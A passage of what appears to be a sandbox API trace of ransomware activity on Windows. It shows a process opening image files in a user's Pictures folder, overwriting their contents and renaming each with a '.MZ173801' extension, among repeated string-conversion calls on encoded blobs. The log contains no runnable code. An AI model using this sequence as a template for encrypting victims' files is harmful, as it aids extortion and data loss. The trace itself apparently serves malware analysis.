lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.005] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.005] GetCurrentThreadId () returned 0x1358 [0115.005] GetCurrentThreadId () returned 0x1358 [0115.005] GetCurrentThreadId () returned 0x1358 [0115.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\3JY_fq-iYjeZZ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\3jy_fq-iyjezz.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x123a5 [0115.005] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.005] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x123a5, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x123a5, lpOverlapped=0x0) returned 1 [0115.007] CloseHandle (hObject=0x3d0) returned 1 [0115.008] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\3JY_fq-iYjeZZ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\3jy_fq-iyjezz.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.009] WriteFile (in: hFile=0x3d0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x123a5, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f6f0*=0x123a5, lpOverlapped=0x0) returned 1 [0115.020] CloseHandle (hObject=0x3d0) returned 1 [0115.229] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\3JY_fq-iYjeZZ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\3jy_fq-iyjezz.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\3JY_fq-iYjeZZ.bmp.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\3jy_fq-iyjezz.bmp.mz173801")) returned 1 [0115.230] GetCurrentThreadId () returned 0x1358 [0115.230] GetCurrentThreadId () returned 0x1358 [0115.230] GetCurrentThreadId () returned 0x1358 [0115.230] GetCurrentThreadId () returned 0x1358 [0115.230] GetCurrentThreadId () returned 0x1358 [0115.230] GetCurrentThreadId () returned 0x1358 [0115.230] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b5f9d0, ftCreationTime.dwHighDateTime=0x1d5e6e7, ftLastAccessTime.dwLowDateTime=0x2d7fee90, ftLastAccessTime.dwHighDateTime=0x1d5ecf1, ftLastWriteTime.dwLowDateTime=0x2d7fee90, ftLastWriteTime.dwHighDateTime=0x1d5ecf1, nFileSizeHigh=0x0, nFileSizeLow=0x5259, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="aY06BCEf5o.gif", cAlternateFileName="AY06BC~1.GIF")) returned 1 [0115.230] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.230] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.230] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\aY06BCEf5o.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\ay06bcef5o.gif"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b5f9d0, ftCreationTime.dwHighDateTime=0x1d5e6e7, ftLastAccessTime.dwLowDateTime=0x2d7fee90, ftLastAccessTime.dwHighDateTime=0x1d5ecf1, ftLastWriteTime.dwLowDateTime=0x2d7fee90, ftLastWriteTime.dwHighDateTime=0x1d5ecf1, nFileSizeHigh=0x0, nFileSizeLow=0x5259)) returned 1 [0115.230] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.230] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0115.231] GetCurrentThreadId () returned 0x1358 [0115.231] GetCurrentThreadId () returned 0x1358 [0115.231] GetCurrentThreadId () returned 0x1358 [0115.231] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.231] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0115.231] GetCurrentThreadId () returned 0x1358 [0115.231] GetCurrentThreadId () returned 0x1358 [0115.231] GetCurrentThreadId () returned 0x1358 [0115.231] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\aY06BCEf5o.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\ay06bcef5o.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.232] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0115.232] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.232] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x5259 [0115.232] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0115.232] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x5259, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x5259, lpOverlapped=0x0) returned 1 [0115.233] CloseHandle (hObject=0x3d0) returned 1 [0115.233] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\aY06BCEf5o.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\ay06bcef5o.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0115.234] WriteFile (in: hFile=0x3d0, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x5259, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f6f0*=0x5259, lpOverlapped=0x0) returned 1 [0115.235] CloseHandle (hObject=0x3d0) returned 1 [0115.240] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\aY06BCEf5o.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\ay06bcef5o.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\aY06BCEf5o.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\ay06bcef5o.gif.mz173801")) returned 1 [0115.240] GetCurrentThreadId () returned 0x1358 [0115.240] GetCurrentThreadId () returned 0x1358 [0115.240] GetCurrentThreadId () returned 0x1358 [0115.240] GetCurrentThreadId () returned 0x1358 [0115.240] GetCurrentThreadId () returned 0x1358 [0115.241] GetCurrentThreadId () returned 0x1358 [0115.241] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x163e7250, ftCreationTime.dwHighDateTime=0x1d5e649, ftLastAccessTime.dwLowDateTime=0xd0e42e40, ftLastAccessTime.dwHighDateTime=0x1d5e61e, ftLastWriteTime.dwLowDateTime=0xd0e42e40, ftLastWriteTime.dwHighDateTime=0x1d5e61e, nFileSizeHigh=0x0, nFileSizeLow=0x1426a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="BDibx-.png", cAlternateFileName="")) returned 1 [0115.241] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0115.241] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0115.241] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F yK2LwO\\BDibx-.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f yk2lwo\\bdibx-.png"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x163e7250, ftCreationTime.dwHighDateTime=0x1d5e649, ftLastAccessTime.dwLowDateTime=0xd0e42e40, ftLastAccessTime.dwHighDateTime=0x1d5e61e, ftLastWriteTime.dwLowDateTime=0xd0e42e40, ftLastWriteTime.dwHighDateTime=0x1d5e61e, nFileSizeHigh=0x0, nFileSizeLow=0x1426a)) returned 1 [0115.241] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0115.241] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0I